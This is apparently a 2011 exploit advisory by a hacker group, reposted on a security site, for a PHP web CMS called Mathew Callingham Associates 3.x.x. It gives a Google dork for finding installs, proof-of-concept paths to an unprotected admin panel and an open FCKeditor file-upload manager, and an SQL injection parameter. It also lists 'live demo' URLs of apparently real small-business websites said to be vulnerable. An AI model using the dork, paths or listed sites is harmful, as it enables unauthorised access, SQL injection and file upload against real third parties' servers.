Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass

2011.05.23
Credit: Net.Edit0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

========================================================================= Mathew Callingham Associatess 3.x.x Multiple Vulnerability ========================================================================== [+]Title :.......Mathew Callingham Associatess 3.x.x Multiple Vulnerability [+]Author :......Net.Edit0r [+]Tested on :...Linux/PHP --------------------------------------------------------------------------- [~] Founded by Net.Edit0r [~] Team: Black Hat Group #BHG [~] Contact: Black.hat.tm@Gmail.Com [~] Home: http://Black-HG.Org [~] Vendor: http://designer-website.com/ [~] Category: Web Apps ==========ExPl0iT3d by Net.Edit0r========== [+] DORK: "Designed by Mathew Callingham Associates" [ I ]. Multiple Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+++] Important: The security problem in the directory "admin" has been created. [P0C]: http://127.0.0.1/admin/editor/filemanager/upload/test.html [P0C]: http://127.0.0.1/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php [P0C]: http://127.0.0.1/admin/ Admin PaneL Edite Page ! [P0C]: http://127.0.0.1/viewclassified.php?classified=[SQL] [L!v3 D3m0's]: http://www.stockton-dancing.co.uk/admin/ <> 1 http://www.1pricepcrepairs.com/admin/ <> 1 http://platinumbuilders.co.uk/admin/editor/filemanager/upload/test.html <> 2 http://www.holbro.net/admin/editor/filemanager/upload/test.html <> 2 http://www.carpfishingtips.co.uk/viewclassified.php?classified=15 [SQL] <> 3 http://www.dcs-paving.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php <> 4 http://www.stockton-dancing.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php <> 4 +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+] TIME TABLE: 20 May 2011 - Vulnerability discovered. 21 May 2011 - Advisory released. =========================================================================================== [!] Black Hat Group ./Iranian HackerZ =========================================================================================== [!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net =========================================================================================== [!] Greetz To : DarkCoder | Amir-MaGiC | 3H34N | H3x | D3adlY & All Iranian HackerZ =========================================================================================== [!] Spec Th4nks: HUrr!c4nE | B3hz4d | M4Hd1 | Cho0bin And All My Friendz =========================================================================================== [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top